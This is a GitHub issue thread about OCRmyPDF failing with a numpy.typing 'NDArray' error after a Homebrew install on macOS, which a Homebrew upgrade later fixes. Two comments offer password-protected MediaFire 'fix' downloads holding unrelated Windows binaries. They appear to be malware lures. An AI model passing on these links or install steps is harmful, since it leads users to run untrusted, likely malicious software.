### ISSUE TITLE
[Bug]: "AttributeError: module 'numpy.typing' has no attribute 'NDArray'" after Homebrew installation

### ISSUE THREAD

**Issue by tillboehringer** [ocrmypdf/OCRmyPDF#1387]
### What were you trying to do?

Just straight up convert a File with:
`ocrmypdf Statistics_raw.pdf Statistics.pdf`
or even get the version with:
`ocrmypdf --version`

But I get:
`AttributeError: module 'numpy.typing' has no attribute 'NDArray'`

### Where are you installing/running from?

Homebrew

### OCRmyPDF version

can't output version, installed 28.08.24

### What operating system are you working on?

macOS

### Operating system details and version

14.6.1

### Simple sanity checks

- [X] Operating system is currently supported by its vendor (not end of life)
- [X] Python version is compatible with OCRmyPDF
- [X] This issue is not about a specific input file

### Relevant log output

```plain text
% ocrmypdf --version
Traceback (most recent call last):
  File "/opt/homebrew/bin/ocrmypdf", line 5, in <module>
    from ocrmypdf.__main__ import run
  File "/opt/homebrew/Cellar/ocrmypdf/16.4.3/libexec/lib/python3.12/site-packages/ocrmypdf/__init__.py", line 10, in <module>
    from ocrmypdf import helpers, hocrtransform, pdfa, pdfinfo
  File "/opt/homebrew/Cellar/ocrmypdf/16.4.3/libexec/lib/python3.12/site-packages/ocrmypdf/helpers.py", line 26, in <module>
    import img2pdf
  File "/opt/homebrew/Cellar/ocrmypdf/16.4.3/libexec/lib/python3.12/site-packages/img2pdf.py", line 25, in <module>
    from PIL import Image, TiffImagePlugin, GifImagePlugin, ImageCms
  File "/opt/homebrew/opt/pillow/lib/python3.12/site-packages/PIL/Image.py", line 68, in <module>
    from ._typing import StrOrBytesPath, TypeGuard
  File "/opt/homebrew/opt/pillow/lib/python3.12/site-packages/PIL/_typing.py", line 10, in <module>
    NumpyArray = npt.NDArray[Any]
                 ^^^^^^^^^^^
AttributeError: module 'numpy.typing' has no attribute 'NDArray'
```

**Comment by jbarlow83** [comment]
Not my circus, not my monkeys, I'm afraid. This is an issue in Pillow, or Homebrew. Or numpy.

**Comment by tillboehringer** [comment]
> Not my circus, not my monkeys, I'm afraid. This is an issue in Pillow, or Homebrew. Or numpy.

Ok then I will look into this, but thanks for the fast reply and the time you invest into the project.

**Comment by onjour** [comment]
I'm having the same issue as well on my MBP M1 running on Sonoma. I'm really not tech savvy and I'm clueless on how to troubleshoot this. If someone can help that'd be much appreciated!

**Comment by onjour** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Thanks, file listing is as follows:

- */fix/libssp-0.dll
- */fix/libstdc++-6.dll
- */fix/msvcp140.dll
- */fix/x86_64-w64-ranlib.exe

...we're both running Macs, .exe binaries aren't going to do much I'm afraid.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by onjour** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

Thanks, again : **we're running ARM Macintosh** ! Your fix cannot be installed on those machines

If you can further reference your fix that might help

**Comment by onjour** [comment]
@tillboehringer in the meantime I bashed my daily command

- `brew update && brew upgrade && brew cleanup`

...and ocrmypdf is working again, I don't understand what happened but I'm relieved!

**Comment by jbarlow83** [comment]
@onjour That suggests it was temporary breakage that probably broke a lot of other things, and Homebrew has since fixed it all.

**Comment by tillboehringer** [comment]
> @tillboehringer in the meantime I bashed my daily command
> 
> * `brew update && brew upgrade && brew cleanup`
> 
> ...and ocrmypdf is working again, I don't understand what happened but I'm relieved!

Sadly didn't work for me, but when I have some more time I will try to troubleshoot the matter.
Thank you all for the tips.
